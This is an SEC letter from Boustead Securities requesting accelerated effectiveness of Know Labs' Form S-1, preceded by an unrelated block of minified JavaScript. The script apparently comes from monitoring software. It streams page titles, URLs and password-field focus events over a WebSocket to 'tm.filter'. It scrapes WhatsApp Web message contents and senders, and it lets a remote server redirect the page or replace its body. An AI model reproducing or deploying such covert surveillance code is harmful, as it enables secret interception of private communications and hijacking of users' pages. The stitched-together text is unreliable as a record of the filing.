 !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"<unnamed>";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t<Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e<Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length<=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length<=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)>1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y<<7)+(Y<<3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t<e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=>H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=>H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e<Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11<Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0<(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a<s;a++)t=Y[a],!e.indexOf(t)&&t.length>r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2>D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7>D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70>c.Y?2e3:100>c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1>c.M||12<c.M||1>c.D||c.D>Y[c.M-1]||23<c.H||59<c.m||59<c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"3cc3a378-79b2-4234-b4c5-225d3778a248",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"5588",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();

Boustead Securities LLC
6 Venture, Suite 395
Irvine, CA 92618

September 13, 2022

VIA EDGAR

U.S. Securities and Exchange Commission
Division of Corporation Finance
100 F Street, N.E.
Washington, D.C. 20549

Re:
Know Labs, Inc.
Registration Statement on Form S-1 (File No. 333-266423)
Request for Acceleration of Effective Date

Ladies and Gentlemen:

In accordance with Rule 461 under the Securities Act of 1933, as amended (the “Act”), Boustead Securities, LLC, as representative of several underwriters, hereby join Know Labs, Inc. (the “Company”) in requesting that the Securities and Exchange Commission take appropriate action to cause the Registration Statement on Form S-1 (File No. 333-266423) (the “Registration Statement”) to become effective on September 15, 2022, at 4:30 p.m., Eastern Time, or as soon thereafter as practicable, or at such other time as the Company or its outside counsel, Bevilacqua PLLC, request by telephone that such Registration Statement be declared effective.

Pursuant to Rule 460 under the Act, we wish to advise you that the underwriters have distributed as many copies of the preliminary prospectus dated September 1, 2022 to underwriters, dealers, institutions and others as appears to be reasonable to secure adequate distribution of the preliminary prospectus..

The undersigned advise that they have complied and will continue to comply with, and that they have been informed by the participating underwriters and dealers that they have complied with and will continue to comply with, the requirements of Rule 15c2-8 under the Securities Exchange Act of 1934, as amended.

Very truly yours, Boustead Securities, LLC

By:	/s/ Keith Moore
Name:	Keith Moore
Title:	Chief Executive Officer